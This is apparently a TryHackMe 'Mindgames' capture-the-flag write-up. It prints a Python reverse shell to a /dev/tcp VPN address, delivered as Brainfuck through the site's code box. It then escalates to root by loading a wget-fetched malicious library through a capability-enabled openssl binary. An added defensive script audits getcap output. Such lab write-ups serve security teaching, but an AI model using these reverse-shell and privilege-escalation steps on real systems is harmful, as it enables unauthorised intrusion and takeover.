Mindgames — TryHackMe — Writeup

Hello. I’m Rahmos. Here is my Mindgames — TryHackMe — Writeup. Check it out!

First, deploy the machine and run nmap to find open ports:

nmap -A -T4 -p- -v <ip>

There are 2 open ports: 22 (SSH) and 80 (HTTP).

First, let’s access the website.

Okay, so it’s many lines of the Brainfuck programming language, and also a box for us to run code. I tried pasting the “Hello, World” Brainfuck line and it works!

That means you need to convert your Python code to Brainfuck, and then it can be executed here. So if I convert my Python reverse shell code to Brainfuck and run it, maybe I’ll get a shell too! Note that it only runs Python, not other languages.

I will use this link to decode or encode my Python code to Brainfuck. So here’s my Python code:

import os

os.system('bash -c "bash -i >& /dev/tcp/<my-VPN-ip>/4444 0>&1"')

Paste these lines into the link above and click encrypt, and you will get the Brainfuck code back.

Start a listener on your machine:

nc -lvnp 4444

Then paste the Brainfuck code into the website and run it, and you will have the shell!

Now I’m in! Move around and get the 1st flag:

Now I’ll find a way to own root and get the final flag. Spawn a tty shell for stability using Python:

python3 -c 'import pty; pty.spawn("/bin/bash")'

First, let’s try sudo -l to see if mindgames can run sudo:

Uh oh! I don’t know mindgames’s password yet, so I cannot run sudo now. Let’s try another way. This time, use capabilities:

getcap -r / 2>/dev/null

The openssl binary has the setuid cap, which means I can use openssl to setuid to 0 (root’s uid) and become root. Look at openssl | GTFOBins:

OpenSSL can execute code via a library. So, I can code a simple C program to setuid(0), compile it to a library and use OpenSSL to exec it. I’ll use this link for reference.
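From the defender's side, the same getcap output can be audited for binaries like this one. The script below is an added example, not part of the original writeup; the sample getcap lines are constructed, and the list of risky capabilities is my own selection rather than an exhaustive one.

```python
import re

# Capabilities that hand out root or bypass file permissions when permitted or
# effective. This selection is an assumption of the example, not a full list.
RISKY = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
         "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
         "cap_fowner", "all"}

# One clause of libcap's text form, e.g. "cap_setuid+ep" or "cap_a,cap_b=eip".
CLAUSE = r"(?:cap_[a-z0-9_]+|all)(?:,cap_[a-z0-9_]+)*(?:[=+-][eip]*)+"
# getcap prints "path = caps" (older libcap) or "path caps" (newer libcap).
LINE_RE = re.compile(rf"^(?P<path>/.+?) (?:= )?(?P<caps>{CLAUSE}(?: {CLAUSE})*)$")

# Constructed sample output; paths are illustrative, not taken from the box.
SAMPLE = """\
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
/opt/app/helper cap_setuid,cap_net_bind_service=i
/opt/app/worker cap_dac_override,cap_net_bind_service=eip
"""

def parse_getcap(output):
    """Return {path: {capability: flags}} where flags is a subset of e, i, p."""
    result = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # error text or a format this example does not cover
        caps = result.setdefault(m["path"], {})
        for clause in m["caps"].split():
            names, ops = re.match(r"([a-z0-9_,]+)((?:[=+-][eip]*)+)$", clause).groups()
            flags = set()
            # "=" and "+" raise flags, "-" lowers them again
            for op, letters in re.findall(r"([=+-])([eip]*)", ops):
                flags = flags - set(letters) if op == "-" else flags | set(letters)
            for name in names.split(","):
                caps.setdefault(name, set()).update(flags)
    return result

def risky_binaries(output):
    """List (path, capability) pairs where a risky capability is permitted or effective."""
    return [(path, name)
            for path, caps in parse_getcap(output).items()
            for name, flags in sorted(caps.items())
            if name in RISKY and flags & {"e", "p"}]

if __name__ == "__main__":
    for path, cap in risky_binaries(SAMPLE):
        print(f"review: {path} holds {cap}")
```

Feed it the output of getcap -r / 2>/dev/null from a host you administer; anything it reports should either lose the capability or be justified and monitored.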

My program will look like this:

Now, compile this .c file into a library, then transfer it to the target machine.

gcc -fPIC -o shellroot.o -c shellroot.c

gcc -shared -o shellroot.so -lcrypto shellroot.o

These 2 commands will compile the C program to a library called “shellroot.so”:

Now start an HTTP server from your machine:

python3 -m http.server 9000

Or with python2:

python2 -m SimpleHTTPServer 9000

Then, from the target machine, cd /tmp and:

wget http://<your-VPN-ip>:9000/shellroot.so

The library has been transferred successfully! Now use OpenSSL to exec this lib:

openssl req -engine /tmp/shellroot.so

Now I’m root! Get the final flag:

The end.


I’m Groot